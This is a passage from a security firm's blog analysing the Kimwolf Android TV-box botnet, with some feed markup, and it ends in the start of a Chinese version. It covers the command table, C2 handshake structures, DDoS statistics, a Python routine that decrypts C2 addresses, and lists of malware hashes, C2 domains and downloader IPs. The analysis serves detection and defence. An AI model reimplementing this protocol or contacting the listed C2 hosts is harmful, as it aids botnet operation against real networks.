</thead>
<tbody>
<tr>
<td>0</td>
<td>register</td>
</tr>
<tr>
<td>1</td>
<td>verify</td>
</tr>
<tr>
<td>2</td>
<td>confirm</td>
</tr>
<tr>
<td>3</td>
<td>heartbeat</td>
</tr>
<tr>
<td>4</td>
<td>reconnect</td>
</tr>
<tr>
<td>5</td>
<td>tcp proxy</td>
</tr>
<tr>
<td>6</td>
<td>udp proxy</td>
</tr>
<tr>
<td>7</td>
<td>reverse shell</td>
</tr>
<tr>
<td>8</td>
<td>cmd execute</td>
</tr>
<tr>
<td>9</td>
<td>write file</td>
</tr>
<tr>
<td>10</td>
<td>read file</td>
</tr>
<tr>
<td>12</td>
<td>ddos attack</td>
</tr>
</tbody>
</table>
<p>Communication initialization between the Bot and C2 server adopts a three-stage handshake mechanism. Both parties must sequentially complete the three interactions of <code>register</code>, <code>verify</code>, and <code>confirm</code> to achieve two-way identity authentication before it is considered a trusted session established.<br>
Next, let&apos;s explain the interaction process between Bot and C2 using actually generated network traffic.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_traffic.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<h4 id="step-1-register-botc2">Step 1: Register, Bot ---&gt; C2</h4>
<p>The Bot sends two 18-byte Headers to the C2, where MsgType is 0, MsgID, BodyLen, CRC32 fields are all 0, and Magic is <code>FD9177FF</code>.</p>
<h4 id="step-2-verify-c2bot">Step 2: Verify, C2 ---&gt; Bot</h4>
<p>The C2 generates an Elliptic Curve Digital Signature for a random message using a private key and constructs the packet Body part in the following format.</p>
<pre><code class="language-go">type VerifyBody struct {
	MsgLen uint32
	Msg    []byte
	SigLen uint32
	Sig    []byte
}
</code></pre>
<p>Parsing the Body in the example according to the above structure reveals:</p>
<ul>
<li>MsgLen is 4 bytes</li>
<li>Msg is <code> xx xx xx xx</code></li>
<li>SigLen is 0x47 bytes</li>
<li>Signature</li>
</ul>
<pre><code>  #Signature
  
  00000000  30 45 02 20 14 ca ab 58 4d 88 b7 e2 26 f2 a0 80  |0E. .&#xCA;&#xAB;XM.&#xB7;&#xE2;&amp;&#xF2;&#xA0;.|
  00000010  49 22 c9 b0 98 9e f4 2b f9 01 8e 4c 20 71 ed 17  |I&quot;&#xC9;&#xB0;..&#xF4;+&#xF9;..L q&#xED;.|
  00000020  cc 57 b6 b4 02 21 00 e0 c7 92 cb 28 d8 c9 d7 66  |&#xCC;W&#xB6;&#xB4;.!.&#xE0;&#xC7;.&#xCB;(&#xD8;&#xC9;&#xD7;f|
  00000030  4f 1b d0 80 b8 35 26 dd 68 65 93 f2 69 13 13 e8  |O.&#xD0;.&#xB8;5&amp;&#xDD;he.&#xF2;i..&#xE8;|
  00000040  42 bd a7 6d a8 04 92                             |B&#xBD;&#xA7;m&#xA8;..|

</code></pre>
<p>When the Bot receives the Verify packet, it uses the hardcoded public key to verify the signature. Once verified, it enters the final Confirm stage. The author of Kimwolf designed this mechanism with the intention of protecting their C2 network from being taken over by others.</p>
<pre><code># Publickey

00000000  30 59 30 13 06 07 2a 86 48 ce 3d 02 01 06 08 2a  |0Y0...*.H&#xCE;=....*|
00000010  86 48 ce 3d 03 01 07 03 42 00 04 ed 6a a0 57 2d  |.H&#xCE;=....B..&#xED;j&#xA0;W-|
00000020  53 02 ce 35 cc 0a 04 93 2d b4 86 c9 a8 e2 93 f5  |S.&#xCE;5&#xCC;...-&#xB4;.&#xC9;&#xA8;&#xE2;.&#xF5;|
00000030  69 07 86 0f 99 42 4b a6 5c 12 7a e7 12 48 56 ad  |i....BK&#xA6;\.z&#xE7;.HV.|
00000040  34 b5 ae 92 ec 98 c9 bc e1 d8 15 dc 6e 1c 59 1b  |4&#xB5;&#xAE;.&#xEC;.&#xC9;&#xBC;&#xE1;&#xD8;.&#xDC;n.Y.|
00000050  be 96 b8 a9 5b 95 46 34 19 5a d2                 |&#xBE;.&#xB8;&#xA9;[.F4.Z&#xD2;|

</code></pre>
<h4 id="step-3-confirm-botc2">Step 3: Confirm, Bot -&gt; C2</h4>
<p>The Bot uses the first parameter passed at runtime as the group identifier, constructs it according to the GroupBody structure, and reports it to the C2. The group string used in the example is &quot;android-postboot-rt&quot;.</p>
<pre><code class="language-go">type GroupBody struct {
	MsgLen uint32
	Group    []byte
}

</code></pre>
<h4 id="step-3-confirm-c2bot">Step 3: Confirm, C2 -&gt; BOT</h4>
<p>After receiving the Bot&apos;s Confirm packet, the C2 server checks whether its belonging group has been pre-enabled in the campaign. If the match is successful, the Bot&apos;s identity is confirmed as legal, and a Confirm response packet is sent back to it. The MsgType field value of this response packet is 2, and MsgID, BodyLen, CRC32 fields are all set to 0.</p>
<p>After the above process, the Bot and C2 complete the two-way identity authentication, and the Bot begins waiting to execute commands sent by the C2. When the command number is 12, Kimwolf executes DDoS-related functions. I believe readers familiar with Mirai will smile knowingly when seeing the DDoSBody, as this structure originates exactly from Mirai.</p>
<pre><code class="language-go">Type DDoSBody struct {
	AtkID     uint32
	AtkType   uint8
	Duration  uint32
	TargetCnt uint32
	Targets   []Target
	FlagCnt   uint32
	Flags     []Flag
}

</code></pre>
<p>Below are the 13 DDoS attack methods supported by Kimwolf.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_vector.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<h1 id="command-tracking">Command Tracking</h1>
<p>Data from Xlab shows that the main command of the Kimwolf botnet is to use Bot nodes to provide proxy services, accounting for 96.5% of all commands. The rest are DDoS attack commands. DDoS attack targets are spread across various industries globally. Attack targets are mainly concentrated in regions like the USA, China, France, Germany, and Canada.</p>
<figure style="text-align:center;">
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf.cmd.type.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" style="width:100%;">
<figcaption>Distribution of command types</figcaption>
</figure>
<h2 id="17-billion-in-3-days">1.7 Billion in 3 Days</h2>
<p>From November 19 to 22, in just 3 short days, Kimwolf issued a staggering <strong>1.7 billion commands</strong>, randomly attacking massive amounts of IP addresses globally. We don&apos;t know why it had such confusing attack behavior, as these attacks might not even cause substantial damage to the target addresses. We even once suspected whether a BUG produced by ourselves caused these anomalies. It wasn&apos;t until we verified data with multiple top cloud service providers that we finally confirmed&#x2014;Kimwolf is just that crazy; it indeed sprayed the entire internet.</p>
<figure style="text-align:center;">
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1.1Billion.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" style="width:100%;">
<figcaption>DDoS Attack Trends</figcaption>
</figure>
<h2 id="arrogant-attack-payloads">Arrogant Attack Payloads</h2>
<p>Kimwolf often includes various ridicule, provocation, and even extortion information in DDoS Payloads.</p>
<ul>
<li>Ridicule<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_bad_cmd_2.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></li>
<li>Provocation<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_bad_cmd_1.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></li>
<li>Extortion<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_ransom_cmd.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></li>
</ul>
<h1 id="additional-components">Additional Components</h1>
<p>In this campaign, to maximize the bandwidth extraction from compromised devices and maximize profit, the attackers deployed a Rust-based Command Client and ByteConnect SDK in addition to Kimwolf and Aisuru.</p>
<h4 id="1-command-client">1: Command Client</h4>
<p>The purpose of the Command Client is to form a proxy network. It targets proxying socks, receives proxy requests from C2, and returns proxy results to C2.</p>
<p>The sample saves the CC address in ciphertext in the rodata section. The decryption algorithm is not complex, being a byte-wise XOR with a password table of the same length.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_ruststr.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<pre><code class="language-python">def dec(encbts):
    tb1_off = 0
    tb2_off = 0x058BCD2 - 0x058BCA0
    bts = []
    for i in range(0, 0x30*4):
        bts.append(chr(encbts[tb1_off+i] ^ encbts[tb2_off+i]))
    return(&quot;&quot;.join(bts[:0x32]))

</code></pre>
<p>Based on the samples we have, two CC addresses can be restored, as follows:</p>
<pre><code>proxy-sdk.14emeliaterracewestroxburyma02132.su:443
sdk-bright.14emeliaterracewestroxburyma02132.su:443

</code></pre>
<h4 id="2-byteconnect-sdk">2: ByteConnect SDK</h4>
<p>The so-called ByteConnect SDK is a monetization solution that helps developers generate revenue through applications on various platforms. They claim their SDK is designed to be lightweight, secure, and easy to integrate; it is ad-free, has no cryptocurrency mining, does not affect performance, has minimal impact on user experience, and users won&apos;t even notice its existence.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_byteconnect.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p><code>mreo12</code> downloaded by the Downloader script is exactly the ByteConnect SDK.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_bc.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>ByteConnect&apos;s homepage has a revenue calculation formula: 10,000 access point users, 70% Opt-in Rate, will yield $490 monthly revenue. With Kimwolf&apos;s scale of 1.8 million, the organization behind it earns an astonishing $88,200 monthly through ByteConnect.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_money.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<h1 id="little-gossip">Little Gossip</h1>
<p>Investigations found that the author of Kimwolf shows an almost &quot;obsessive&quot; fixation on the well-known cybersecurity investigative journalist Brian Krebs, leaving easter eggs related to him in multiple samples.</p>
<p>For example, in sample <code>2078af54891b32ea0b1d1bf08b552fe8</code>, the domain <strong>fuckbriankrebs[.]com</strong> is embedded in both its <code>udp_dns</code> and <code>mc_enc</code> attack methods, used to generate DNS request payloads.</p>
<p>And in the console output of sample <code>1c03d82026b6bcf5acd8fc4bcf48ed00</code>, the text <strong>KREBSFIVEHEADFANCLUB</strong> appears directly, literally &quot;Krebs Big Forehead Fan Club,&quot;. Talk about a dedicated &apos;hater&apos;.</p>
<p>Besides this direct &quot;tribute,&quot; there is &quot;love&quot; hidden deeper. The C2 domain we took over <code>fuckyoukrebs1.briankrabs.seanobrien[redacted]ssn[redacted].su</code>, aside from the string &apos;krebs&apos; appearing twice in the domain itself, hides a mystery: <code>seanobrien[redacted]</code> likely corresponds to Krebs&apos; actual address, and <code>ssn[redacted]</code> is likely his Social Security Number. Such behavior can be called a &quot;sasaeng fan&quot; in the cyber security world, truly chilling.</p>
<h1 id="summary">Summary</h1>
<p>This is the majority of the intelligence we currently possess on the Kimwolf botnet. Giant botnets originated with Mirai in 2016, with infection targets mainly concentrated on IoT devices like home broadband routers and cameras. However, in recent years, information on multiple million-level giant botnets like Badbox, Bigpanzi, Vo1d, and Kimwolf has been disclosed, indicating that some attackers have started to turn their attention to various smart TVs and TV boxes. These devices generally suffer from problems like firmware vulnerabilities, pre-installed malicious components, weak passwords, and lack of security update mechanisms, making them extremely easy for attackers to control long-term and use for large-scale cyberattacks. One of our motives for disclosing the Kimwolf botnet this time is to call on the security community to give due attention to smart TV-related devices.</p>
<p>After attackers gain root privileges on smart TVs, the resulting attacks are not limited to traditional cyberspace. Attackers can use controlled terminals to insert tampered, biased, or extreme videos. In the legal systems of many countries, inserting content without written permission violates the contract between the viewer and the TV program provider and is illegal. For example, TV equipment at the HUD headquarters in Washington, D.C., USA, was tampered with by hackers to play an unauthorized AI-forged video (showing Trump kissing Musk&apos;s toes, with the caption <code>LONG LIVE THE REAL KING</code>), triggering significant public safety and public opinion risks, etc. This is our second motive for disclosing the Kimwolf botnet this time, calling on law enforcement agencies to consider scrutinizing such suspected illegal activities related to smart TVs.</p>
<figure style="text-align:center;">
  <img src="https://blog.xlab.qianxin.com/content/images/2025/12/--2025-12-11-23.06.51.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" style="width:100%;">
  <figcaption>
    <a href="https://www.nbcnews.com/politics/doge/fake-video-trump-kissing-musks-feet-displayed-hud-office-washington-rcna193503?ref=blog.xlab.qianxin.com" target="_blank">NBC News</a></figcaption>
</figure>
<p>Against the backdrop of overlapping threats, whether ordinary TV box users, sales channels, operators, or regulatory departments and manufacturers, all must attach great importance to the security of TV boxes. Among them, TV box users should especially: ensure devices come from reliable sources, use firmware that can be updated in time, avoid setting weak passwords, and refuse to install APKs of unknown origin to reduce the risk of being infected and controlled by botnets.</p>
<p>We sincerely welcome CERTs from all countries to contact us, share intelligence and vision, join hands to combat cybercrime, and jointly maintain global cybersecurity. If you are interested in our research, or know inside information, feel free to contact us via <a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X platform</a>.</p>
<h1 id="ioc">IOC</h1>
<h4 id="sample-md5">Sample MD5</h4>
<pre><code># APK
887747dc1687953902488489b805d965
b688c22aabcd83138bba4afb9b3ef4fc
2fd5481e9d20dad6d27e320d5464f71e
5f4ed952e69abb337f9405352cb5cc05
4cd750f32ee5d4f9e335751ae992ce64
8011ed1d1851c6ae31274c2ac8edfc06
95efbc9fdc5c7bcbf469de3a0cc35699
bda398fcd6da2ddd4c756e7e7c47f8d8
ea7e4930b7506c1a5ca7fee10547ef6b
dfe8d1f591d53259e573b98acb178e84
3a172e3a2d330c49d7baa42ead3b6539

# SO ELF
726557aaebee929541f9c60ec86d356e
bf06011784990b3cca02fe997ff9b33d
d086086b35d6c2ecf60b405e79f36d05
2078af54891b32ea0b1d1bf08b552fe8
b89ee1304b94f0951af31433dac9a1bd
34dfa5bc38b8c6108406b1e4da9a21e4
51cfe61eac636aae33a88aa5f95e5185
1c03d82026b6bcf5acd8fc4bcf48ed00

e96073b7ed4a8eb40bed6980a287bc9f
f8a70ca813a6f5123c3869d418f00fe5
33435ec640fbd3451f5316c9e45d46e8
9053cef2ea429339b64f3df88cad8e3f
85ba20e982ed8088bb1ba7ed23b0c497
9b37f3bf3b91aa4f135a6c64aba643bd

# RUST
b1d4739d692d70c3e715f742ac329b05
5490fb81cf24a2defa87ea251f553d11
cf7960034540cd25840d619702c73a26

# Downloader
e4be95de21627b8f988ba9b55c34380c

</code></pre>
<h4 id="c2">C2</h4>
<pre><code>api.groksearch[.net
nnkjzfaxkjanxzk.14emeliaterracewestroxburyma02132[.su

zachebt.chachasli[.de
zachebt.groksearch[.net
rtrdedge1.samsungcdn[.cloud
fuckzachebt.meowmeowmeowmeowmeow.meow.indiahackgod[.su

staging.pproxy1[.fun
sdk-dl-prod.proxiessdk[.online
sdk-dl-production.proxiessdk[.store

lol.713mtauburnctcolumbusoh43085[.st

pawsatyou[.eth
lolbroweborrowtvbro.713mtauburnctcolumbusoh43085[.st

</code></pre>
<h4 id="downloader">Downloader</h4>
<pre><code>93.95.112.50	AS397923 - Resi Rack L.L.C.
93.95.112.51	AS397923 - Resi Rack L.L.C.
93.95.112.52	AS397923 - Resi Rack L.L.C.
93.95.112.53	AS397923 - Resi Rack L.L.C.
93.95.112.54	AS397923 - Resi Rack L.L.C.
93.95.112.55	AS397923 - Resi Rack L.L.C.
93.95.112.59	AS397923 - Resi Rack L.L.C.

</code></pre>
<h1 id="appendix">Appendix</h1>
<h4 id="cyberchef">cyberchef</h4>
<pre><code>https://gchq.github.io/CyberChef/#recipe=Fork(&apos;%5C%5Cn&apos;,&apos;%5C%5Cn&apos;,false)Change_IP_format(&apos;Dotted%20Decimal&apos;,&apos;Hex&apos;)Swap_endianness(&apos;Hex&apos;,4,true)From_Hex(&apos;Auto&apos;)XOR(%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;00%20ce%2004%2091&apos;%7D,&apos;Standard&apos;,false)To_Hex(&apos;Space&apos;,0)Change_IP_format(&apos;Hex&apos;,&apos;Dotted%20Decimal&apos;)&amp;input=NDQuNy4wLjQ1CjE2OC4xLjAuNDUKMTY3LjEuMC40NQoxNjIuMS4wLjQ1CjE4OS4xLjAuNDUKMTgxLjEuMC40NQoxMzEuMS4wLjQ1
</code></pre>
]]></content:encoded></item><item><title><![CDATA[史上最疯：独家揭秘感染全球180万Android设备的巨型僵尸网络Kimwolf]]></title><description><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<p>2025&#x5E74;10&#x6708;24&#x65E5;&#xFF0C;&#x5B89;&#x5168;&#x793E;&#x533A;&#x7684;&#x4FE1;&#x4EFB;&#x4F19;&#x4F34;&#x7ED9;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x4E2A;&#x5168;&#x65B0;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x6837;&#x672C;&#xFF0C;&#x8BE5;&#x6837;&#x672C;&#x6700;&#x7279;&#x522B;&#x7684;&#x5730;&#x65B9;&#x662F;&#x5B83;&#x7684;</p>]]></description><link>https://blog.xlab.qianxin.com/kimwolf-botnet/</link><guid isPermaLink="false">69240caaf39f9e0001b230df</guid><category><![CDATA[DDoS]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[EtherHiding]]></category><category><![CDATA[Android]]></category><category><![CDATA[DOT,]]></category><category><![CDATA[CN]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Wed, 17 Dec 2025 04:31:00 GMT</pubDate><media:content url="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_feature.png" medium="image"/><content:encoded><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_feature.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf"><p>2025&#x5E74;10&#x6708;24&#x65E5;&#xFF0C;&#x5B89;&#x5168;&#x793E;&#x533A;&#x7684;&#x4FE1;&#x4EFB;&#x4F19;&#x4F34;&#x7ED9;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x4E2A;&#x5168;&#x65B0;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x6837;&#x672C;&#xFF0C;&#x8BE5;&#x6837;&#x672C;&#x6700;&#x7279;&#x522B;&#x7684;&#x5730;&#x65B9;&#x662F;&#x5B83;&#x7684;C2&#x57DF;&#x540D;14emeliaterracewestroxburyma02132[.]su&#x5F7C;&#x65F6;&#x5728;<a href="https://developers.cloudflare.com/radar/glossary/?ref=blog.xlab.qianxin.com#domain-rankings">Cloudflare &#x57DF;&#x540D;&#x6D41;&#x884C;&#x5EA6;&#x6392;&#x540D;</a>&#x4E2D;&#x4F4D;&#x5217;&#x7B2C;2&#xFF0C;&#x4E00;&#x5468;&#x4E4B;&#x540E;&#x751A;&#x81F3;&#x8D85;&#x8D8A;Google&#xFF0C;&#x95EE;&#x9F0E;Cloudflare &#x57DF;&#x540D;&#x6D41;&#x884C;&#x5EA6;&#x6392;&#x540D;&#x5168;&#x7403;&#x7B2C;&#x4E00;&#x3002;&#x6BEB;&#x65E0;&#x7591;&#x95EE;&#x8FD9;&#x662F;&#x4E00;&#x4E2A;&#x8D85;&#x7EA7;&#x5927;&#x89C4;&#x6A21;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x57FA;&#x4E8E;&#x6837;&#x672C;&#x8FD0;&#x884C;&#x65F6;&#x8F93;&#x51FA;&#x7684;&#x4FE1;&#x606F;&#x4EE5;&#x53CA;&#x4F7F;&#x7528;wolfssl&#x5E93;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x5B83;&#x547D;&#x540D;&#x4E3A;Kimwolf.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_cfno1.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>Kimwolf &#x662F;&#x4E00;&#x4E2A;&#x4F7F;&#x7528; NDK &#x7F16;&#x8BD1;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x9664;&#x5177;&#x5907;&#x5178;&#x578B;&#x7684; DDoS &#x653B;&#x51FB;&#x80FD;&#x529B;&#x5916;&#xFF0C;&#x8FD8;&#x96C6;&#x6210;&#x4E86;&#x4EE3;&#x7406;&#x8F6C;&#x53D1;&#x3001;&#x53CD;&#x5411; Shell &#x548C;&#x6587;&#x4EF6;&#x7BA1;&#x7406;&#x7B49;&#x529F;&#x80FD;&#x3002;&#x4ECE;&#x6574;&#x4F53;&#x67B6;&#x6784;&#x6765;&#x770B;&#xFF0C;&#x5176;&#x529F;&#x80FD;&#x8BBE;&#x8BA1;&#x5E76;&#x4E0D;&#x590D;&#x6742;&#xFF0C;&#x4F46;&#x5176;&#x4E2D;&#x4ECD;&#x6709;&#x4E00;&#x4E9B;&#x503C;&#x5F97;&#x5173;&#x6CE8;&#x7684;&#x4EAE;&#x70B9;&#xFF1A;&#x4F8B;&#x5982;&#xFF0C;&#x8BE5;&#x6837;&#x672C;&#x91C7;&#x7528;&#x4E86;&#x7B80;&#x5355;&#x800C;&#x6709;&#x6548;&#x7684;&#x6808;&#x5F02;&#x6216;&#xFF08;Stack XOR&#xFF09;&#x64CD;&#x4F5C;&#x5BF9;&#x654F;&#x611F;&#x6570;&#x636E;&#x8FDB;&#x884C;&#x52A0;&#x5BC6;&#xFF1B;&#x540C;&#x65F6;&#x5229;&#x7528; DNS over TLS&#xFF08;DoT&#xFF09;&#x534F;&#x8BAE;&#x5C01;&#x88C5; DNS &#x8BF7;&#x6C42;&#xFF0C;&#x4EE5;&#x89C4;&#x907F;&#x4F20;&#x7EDF;&#x5B89;&#x5168;&#x68C0;&#x6D4B;&#x3002;&#x6B64;&#x5916;&#xFF0C;&#x5176; C2 &#x8EAB;&#x4EFD;&#x8BA4;&#x8BC1;&#x91C7;&#x7528;&#x57FA;&#x4E8E;&#x692D;&#x5706;&#x66F2;&#x7EBF;&#x7684;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x4FDD;&#x62A4;&#x673A;&#x5236;&#xFF0C;Bot &#x7AEF;&#x4F1A;&#x5728;&#x9A8C;&#x7B7E;&#x901A;&#x8FC7;&#x540E;&#x624D;&#x63A5;&#x53D7;&#x901A;&#x4FE1;&#x6307;&#x4EE4;&#x3002;&#x8FD1;&#x671F;&#x66F4;&#x5F15;&#x5165;<strong>EtherHiding&#x6280;&#x672F;&#x4EE5;&#x533A;&#x5757;&#x94FE;&#x57DF;&#x540D;&#x5BF9;&#x6297;&#x5904;&#x7F6E;</strong>&#xFF0C;&#x8FD9;&#x4E9B;&#x7279;&#x5F81;&#x5728;&#x540C;&#x7C7B;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4E2D;&#x8F83;&#x4E3A;&#x5C11;&#x89C1;&#x3002;&#x4ECE;&#x6211;&#x4EEC;&#x7684;&#x5206;&#x6790;&#x7ED3;&#x679C;&#x6765;&#x770B;&#xFF0C;&#x5B83;&#x4E3B;&#x8981;&#x9488;&#x5BF9;Android&#x5E73;&#x53F0;&#x7535;&#x89C6;&#x76D2;&#x5B50;&#x3002;C2 &#x540E;&#x53F0;&#x6240;&#x663E;&#x793A;&#x7684; &#x201C;&#x6B22;&#x8FCE;&#x6765;&#x5230; Android Support Center&#x201D; &#x4FE1;&#x606F;&#x4E5F;&#x53EF;&#x4EE5;&#x5370;&#x8BC1;&#x8FD9;&#x4E00;&#x70B9;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_banner.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>Kimwolf&#x6837;&#x672C;&#x4E2D;&#x4F7F;&#x7528;&#x201C;niggabox + v&#x6570;&#x5B57;&#x201D;&#x7684;&#x547D;&#x540D;&#x89C4;&#x5219;&#x6765;&#x6807;&#x8BC6;&#x7248;&#x672C;&#x53F7;&#xFF0C;&#x793E;&#x533A;&#x4F19;&#x4F34;&#x5148;&#x524D;&#x63D0;&#x4F9B;&#x7684;&#x6837;&#x672C;&#x4E3A;v4&#x7248;&#x672C;&#x3002;&#x6211;&#x4EEC;&#x5728;&#x5B8C;&#x6210;&#x9006;&#x5411;&#x5206;&#x6790;&#x4E4B;&#x540E;&#xFF0C;&#x5C06;&#x6837;&#x672C;&#x7684;&#x60C5;&#x62A5;&#x5BFC;&#x5165;<strong>XLab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;&#xFF0C;&#x9646;&#x7EED;&#x6355;&#x83B7;&#x5305;&#x62EC;v4&#x3001;v5&#x5728;&#x5185;&#x7684;&#x591A;&#x4E2A;&#x76F8;&#x5173;&#x6837;&#x672C;&#xFF0C;&#x5B9E;&#x73B0;&#x4E86;&#x5BF9;&#x8BE5;&#x5BB6;&#x65CF;&#x7684;&#x81EA;&#x52A8;&#x5316;&#x6301;&#x7EED;&#x8DDF;&#x8E2A;</strong>&#x3002;</p>
<p>11&#x6708;30&#x65E5;&#xFF0C;&#x6211;&#x4EEC;&#x518D;&#x6B21;&#x6355;&#x83B7;&#x5230;&#x8BE5;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5BB6;&#x65CF;&#x7684;&#x4E00;&#x4E2A;&#x65B0;&#x6837;&#x672C;&#xFF0C;&#x5E76;&#x6210;&#x529F;&#x63A5;&#x7BA1;&#x4E86;&#x5176;&#x4E2D;&#x4E00;&#x4E2A;C2&#x57DF;&#x540D;&#xFF0C;&#x4ECE;&#x800C;&#x9996;&#x6B21;&#x83B7;&#x5F97;&#x4E86;&#x76F4;&#x63A5;&#x89C2;&#x6D4B;&#x8BE5;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x771F;&#x5B9E;&#x8FD0;&#x884C;&#x89C4;&#x6A21;&#x7684;&#x673A;&#x4F1A;&#x3002;&#x57FA;&#x4E8E;&#x4E0E;&#x6211;&#x4EEC;&#x6CE8;&#x518C;&#x7684;C2&#x5730;&#x5740;&#x5EFA;&#x7ACB;&#x8FDE;&#x63A5;&#x3001;&#x4E14;&#x901A;&#x4FE1;&#x884C;&#x4E3A;&#x7B26;&#x5408;Kimwolf C2&#x534F;&#x8BAE;&#x7279;&#x5F81;&#x7684;&#x6E90;IP&#x6570;&#x636E;&#x8FDB;&#x884C;&#x7EDF;&#x8BA1;&#xFF0C;&#x5728;12&#x6708;3&#x65E5;&#x81F3;12&#x6708;5&#x65E5;&#x7684;&#x4E09;&#x5929;&#x5185;&#xFF0C;&#x5171;&#x89C2;&#x6D4B;&#x5230;&#x7D2F;&#x8BA1;&#x7EA6;270 &#x4E07;&#x4E2A;&#x4E0D;&#x540C;&#x7684;&#x6E90;IP&#x5730;&#x5740;&#x3002;&#x5176;&#x4E2D;&#xFF0C;12&#x6708;3&#x65E5;&#x89C2;&#x6D4B;&#x5230;&#x7EA6;136&#x4E07;&#x4E2A;&#x6D3B;&#x8DC3; IP&#xFF0C;12&#x6708;4&#x65E5;&#x7EA6;183&#x4E07;&#x4E2A;&#xFF0C;12&#x6708;5&#x65E5;&#x7EA6;150&#x4E07;&#x4E2A;&#xFF08;&#x4E0D;&#x540C;&#x65E5;&#x671F;&#x4E4B;&#x95F4;&#x5B58;&#x5728;IP&#x91CD;&#x53E0;&#xFF09;&#x3002;&#x5206;&#x6790;&#x8868;&#x660E;&#xFF0C;Kimwolf&#x4E3B;&#x8981;&#x611F;&#x67D3;&#x5BF9;&#x8C61;&#x4E3A;&#x90E8;&#x7F72;&#x5728;&#x4F4F;&#x5B85;&#x7F51;&#x7EDC;&#x73AF;&#x5883;&#x4E2D;&#x7684;&#x7535;&#x89C6;&#x76D2;&#x5B50;&#x3002;&#x7531;&#x4E8E;&#x4F4F;&#x5B85;&#x7F51;&#x7EDC;&#x901A;&#x5E38;&#x91C7;&#x7528;&#x52A8;&#x6001;IP&#x5206;&#x914D;&#x673A;&#x5236;&#xFF0C;&#x8BBE;&#x5907;&#x7684;&#x516C;&#x7F51;IP&#x4F1A;&#x968F;&#x65F6;&#x95F4;&#x53D8;&#x5316;&#xFF0C;&#x56E0;&#x6B64;&#x65E0;&#x6CD5;&#x4EC5;&#x901A;&#x8FC7; 